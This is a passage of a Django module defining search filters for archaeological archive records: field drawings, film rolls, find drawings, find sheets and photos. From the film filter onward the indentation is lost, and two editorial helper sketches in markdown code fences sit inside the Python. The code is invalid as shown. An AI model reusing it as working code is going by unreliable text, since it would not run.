        help_text=Fielddrawing._meta.get_field('creator_scan').help_text,
        label=Fielddrawing._meta.get_field('creator_scan').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/creator_scan",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="excavation_post_excavation"
        ),
        help_text=Fielddrawing._meta.get_field('excavation_post_excavation').help_text,
        label=Fielddrawing._meta.get_field('excavation_post_excavation').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = Fielddrawing
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'filename',
            'document_id',
            'document_title',
            'document_type',
            'creation_date_original',
            'creation_date_scan',
            'creation_date_metadata',
            'creator_metadata',
            'creator_original',
            'storage_folder_original',
            'resolution_scan_ppi',
            'original_material',
            'original_inventory_number',
            'find_inventory_number',
            'amendment_drawn_by',
            'amendment_date',
            'drawer_monogram',
            'excavation_object_id',
            'archaeological_object_id',
            'stratum_id_relative',
            'stratum_id_absolute_prepub',
            'stratum_comment',
            'month',
            'scale',
            'original_comment',
            'digitisation_comment',
            'excavation_id',
            'creation_year_original',
            'season',
            'file_extension',
            'copyright',
            'access',
            'site_id',
            'equipment_scan',
            'source_original_copy_edited_copy',
            'creator_scan',
            'excavation_post_excavation',
        ]
class FilmListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('legacy_id').help_text,
label=Film._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('fc_name').help_text,
label=Film._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('fc_directory').help_text,
label=Film._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('fc_type').help_text,
label=Film._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('fc_filename').help_text,
label=Film._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('fc_extension').help_text,
label=Film._meta.get_field('fc_extension').verbose_name
)
film_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('film_id').help_text,
label=Film._meta.get_field('film_id').verbose_name
)
addition_film_identifier = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('addition_film_identifier').help_text,
label=Film._meta.get_field('addition_film_identifier').verbose_name
)
foto_numbers_missing = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('foto_numbers_missing').help_text,
label=Film._meta.get_field('foto_numbers_missing').verbose_name
)
decomposition_phenomenon = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('decomposition_phenomenon').help_text,
label=Film._meta.get_field('decomposition_phenomenon').verbose_name
)
acetic_acid_smell = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('acetic_acid_smell').help_text,
label=Film._meta.get_field('acetic_acid_smell').verbose_name
)
storage_folder_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('storage_folder_original').help_text,
label=Film._meta.get_field('storage_folder_original').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('original_comment').help_text,
label=Film._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('digitisation_comment').help_text,
label=Film._meta.get_field('digitisation_comment').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('creation_year_original').help_text,
label=Film._meta.get_field('creation_year_original').verbose_name
)
film_format = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="film_format"
),
help_text=Film._meta.get_field('film_format').help_text,
label=Film._meta.get_field('film_format').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/film_format",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
film_brand = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="film_brand"
),
help_text=Film._meta.get_field('film_brand').help_text,
label=Film._meta.get_field('film_brand').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/film_brand",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_camera_brand = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_camera_brand"
),
help_text=Film._meta.get_field('equipment_camera_brand').help_text,
label=Film._meta.get_field('equipment_camera_brand').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_camera_brand",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=Film._meta.get_field('original_material').help_text,
label=Film._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Film
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'film_id',
'film_number',
'addition_film_identifier',
'foto_numbers_missing',
'decomposition_phenomenon',
'acetic_acid_smell',
'storage_folder_original',
'original_comment',
'digitisation_comment',
'document_type',
'excavation_id',
'creation_year_original',
'film_format',
'film_brand',
'equipment_camera_brand',
'original_material',
]
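# NOTE (editorial sketch, not part of the original module): every CharFilter
# above repeats the same three kwargs derived from the model field. A small
# helper like the hypothetical `icontains_filter_kwargs` below could build
# them once; it only touches `_meta.get_field`, so it works with any Django
# model (or a stub) and needs no django_filters import itself.

```python
def icontains_filter_kwargs(model, field_name):
    """Build the kwargs shared by the icontains CharFilters in this module.

    Hypothetical helper; usage would look like:
        legacy_id = django_filters.CharFilter(
            **icontains_filter_kwargs(Film, 'legacy_id')
        )
    """
    field = model._meta.get_field(field_name)
    return {
        'lookup_expr': 'icontains',
        'help_text': field.help_text,
        'label': field.verbose_name,
    }
```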
class FinddrawingListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('legacy_id').help_text,
label=Finddrawing._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('fc_name').help_text,
label=Finddrawing._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('fc_directory').help_text,
label=Finddrawing._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('fc_type').help_text,
label=Finddrawing._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('fc_filename').help_text,
label=Finddrawing._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('fc_extension').help_text,
label=Finddrawing._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('filename').help_text,
label=Finddrawing._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('document_id').help_text,
label=Finddrawing._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('document_title').help_text,
label=Finddrawing._meta.get_field('document_title').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('filename_old').help_text,
label=Finddrawing._meta.get_field('filename_old').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('creation_year_original').help_text,
label=Finddrawing._meta.get_field('creation_year_original').verbose_name
)
storage_folder_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('storage_folder_original').help_text,
label=Finddrawing._meta.get_field('storage_folder_original').verbose_name
)
equipment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('equipment').help_text,
label=Finddrawing._meta.get_field('equipment').verbose_name
)
rendered_in_ink = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('rendered_in_ink').help_text,
label=Finddrawing._meta.get_field('rendered_in_ink').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('original_comment').help_text,
label=Finddrawing._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('digitisation_comment').help_text,
label=Finddrawing._meta.get_field('digitisation_comment').verbose_name
)
file_extension = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension"
),
help_text=Finddrawing._meta.get_field('file_extension').help_text,
label=Finddrawing._meta.get_field('file_extension').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Finddrawing._meta.get_field('copyright').help_text,
label=Finddrawing._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Finddrawing._meta.get_field('access').help_text,
label=Finddrawing._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Finddrawing._meta.get_field('site_id').help_text,
label=Finddrawing._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="source_original_copy_edited_copy"
),
help_text=Finddrawing._meta.get_field('source_original_copy_edited_copy').help_text,
label=Finddrawing._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=Finddrawing._meta.get_field('original_material').help_text,
label=Finddrawing._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Finddrawing._meta.get_field('excavation_post_excavation').help_text,
label=Finddrawing._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Finddrawing
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_scan',
'document_type',
'find_inventory_number',
'filename',
'document_id',
'document_title',
'filename_old',
'creation_date_original',
'creation_year_original',
'creation_date_scan',
'convolute_inventory_number',
'creation_date_metadata',
'bone_stone_inventory_number',
'storage_folder_original',
'equipment',
'resolution_scan_dpi',
'find_date',
'rendered_in_ink',
'original_comment',
'digitisation_comment',
'file_extension',
'copyright',
'access',
'site_id',
'source_original_copy_edited_copy',
'original_material',
'excavation_post_excavation',
]
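# Editorial sketch (hypothetical, not part of the original module): the
# ModelMultipleChoiceFilter blocks above differ only in the collection name,
# which is repeated in the queryset filter and the autocomplete URL. The
# helper below derives the Select2 widget settings from that one name; the
# real filters would still supply queryset, help_text, label and method.

```python
def concept_autocomplete_config(collection_name):
    """Return the Select2Multiple widget settings used by the concept filters.

    Hypothetical helper; e.g. concept_autocomplete_config('copyright')
    yields the url and attrs passed to autocomplete.Select2Multiple above.
    """
    return {
        'url': "/vocabs-ac/specific-concept-ac/{}".format(collection_name),
        'attrs': {
            'data-placeholder': 'Autocomplete ...',
            'data-minimum-input-length': 2,
        },
    }
```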
class FindsheetsListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('legacy_id').help_text,
label=Findsheets._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('fc_name').help_text,
label=Findsheets._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('fc_directory').help_text,
label=Findsheets._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('fc_type').help_text,
label=Findsheets._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('fc_filename').help_text,
label=Findsheets._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('fc_extension').help_text,
label=Findsheets._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('filename').help_text,
label=Findsheets._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('document_id').help_text,
label=Findsheets._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('document_title').help_text,
label=Findsheets._meta.get_field('document_title').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('filename_old').help_text,
label=Findsheets._meta.get_field('filename_old').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('creation_year_original').help_text,
label=Findsheets._meta.get_field('creation_year_original').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('original_comment').help_text,
label=Findsheets._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('digitisation_comment').help_text,
label=Findsheets._meta.get_field('digitisation_comment').verbose_name
)
file_extension = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension"
),
help_text=Findsheets._meta.get_field('file_extension').help_text,
label=Findsheets._meta.get_field('file_extension').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Findsheets._meta.get_field('copyright').help_text,
label=Findsheets._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Findsheets._meta.get_field('access').help_text,
label=Findsheets._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
storage_original = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="storage_original"
),
help_text=Findsheets._meta.get_field('storage_original').help_text,
label=Findsheets._meta.get_field('storage_original').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/storage_original",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Findsheets._meta.get_field('site_id').help_text,
label=Findsheets._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_scan = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_scan"
),
help_text=Findsheets._meta.get_field('equipment_scan').help_text,
label=Findsheets._meta.get_field('equipment_scan').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_scan",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="source_original_copy_edited_copy"
),
help_text=Findsheets._meta.get_field('source_original_copy_edited_copy').help_text,
label=Findsheets._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=Findsheets._meta.get_field('original_material').help_text,
label=Findsheets._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Findsheets._meta.get_field('excavation_post_excavation').help_text,
label=Findsheets._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Findsheets
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_scan',
'archaeological_object_id',
'document_type',
'find_inventory_number',
'convolute_inventory_number',
'bone_stone_inventory_number',
'filename',
'document_id',
'document_title',
'filename_old',
'creation_date_original',
'creation_year_original',
'creation_date_scan',
'creation_date_metadata',
'resolution_scan_dpi',
'excavation_object_id',
'original_comment',
'digitisation_comment',
'file_extension',
'copyright',
'access',
'storage_original',
'site_id',
'equipment_scan',
'source_original_copy_edited_copy',
'original_material',
'excavation_post_excavation',
]

class FotoborndigitalListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('legacy_id').help_text,
label=Fotoborndigital._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('fc_name').help_text,
label=Fotoborndigital._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('fc_directory').help_text,
label=Fotoborndigital._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('fc_type').help_text,
label=Fotoborndigital._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('fc_filename').help_text,
label=Fotoborndigital._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('fc_extension').help_text,
label=Fotoborndigital._meta.get_field('fc_extension').verbose_name
)
folder_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('folder_name').help_text,
label=Fotoborndigital._meta.get_field('folder_name').verbose_name
)
folder_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('folder_id').help_text,
label=Fotoborndigital._meta.get_field('folder_id').verbose_name
)
folder_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('folder_title').help_text,
label=Fotoborndigital._meta.get_field('folder_title').verbose_name
)
folder_name_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('folder_name_old').help_text,
label=Fotoborndigital._meta.get_field('folder_name_old').verbose_name
)
path_filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('path_filename_old').help_text,
label=Fotoborndigital._meta.get_field('path_filename_old').verbose_name
)
path_filename_arche = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('path_filename_arche').help_text,
label=Fotoborndigital._meta.get_field('path_filename_arche').verbose_name
)
find_inventory_number_from_to = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('find_inventory_number_from_to').help_text,
label=Fotoborndigital._meta.get_field('find_inventory_number_from_to').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('creation_year_original').help_text,
label=Fotoborndigital._meta.get_field('creation_year_original').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('original_comment').help_text,
label=Fotoborndigital._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('digitisation_comment').help_text,
label=Fotoborndigital._meta.get_field('digitisation_comment').verbose_name
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Fotoborndigital._meta.get_field('copyright').help_text,
label=Fotoborndigital._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Fotoborndigital._meta.get_field('access').help_text,
label=Fotoborndigital._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Fotoborndigital._meta.get_field('site_id').help_text,
label=Fotoborndigital._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Fotoborndigital
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'folder_name',
'folder_id',
'folder_title',
'folder_name_old',
'path_filename_old',
'path_filename_arche',
'creation_date_metadata',
'find_inventory_number_from_to',
'excavation_object_id',
'creation_year_original',
'original_comment',
'digitisation_comment',
'document_type',
'copyright',
'access',
'site_id',
]

class FotosgescanntListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('legacy_id').help_text,
label=Fotosgescannt._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('fc_name').help_text,
label=Fotosgescannt._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('fc_directory').help_text,
label=Fotosgescannt._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('fc_type').help_text,
label=Fotosgescannt._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('fc_filename').help_text,
label=Fotosgescannt._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('fc_extension').help_text,
label=Fotosgescannt._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('filename').help_text,
label=Fotosgescannt._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('document_id').help_text,
label=Fotosgescannt._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('document_title').help_text,
label=Fotosgescannt._meta.get_field('document_title').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('filename_old').help_text,
label=Fotosgescannt._meta.get_field('filename_old').verbose_name
)
photo_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('photo_number').help_text,
label=Fotosgescannt._meta.get_field('photo_number').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('creation_year_original').help_text,
label=Fotosgescannt._meta.get_field('creation_year_original').verbose_name
)
pixel_size = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('pixel_size').help_text,
label=Fotosgescannt._meta.get_field('pixel_size').verbose_name
)
find_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('find_inventory_number').help_text,
label=Fotosgescannt._meta.get_field('find_inventory_number').verbose_name
)
season = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('season').help_text,
label=Fotosgescannt._meta.get_field('season').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('original_comment').help_text,
label=Fotosgescannt._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('digitisation_comment').help_text,
label=Fotosgescannt._meta.get_field('digitisation_comment').verbose_name
)
file_extension = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension"
),
help_text=Fotosgescannt._meta.get_field('file_extension').help_text,
label=Fotosgescannt._meta.get_field('file_extension').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Fotosgescannt._meta.get_field('copyright').help_text,
label=Fotosgescannt._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
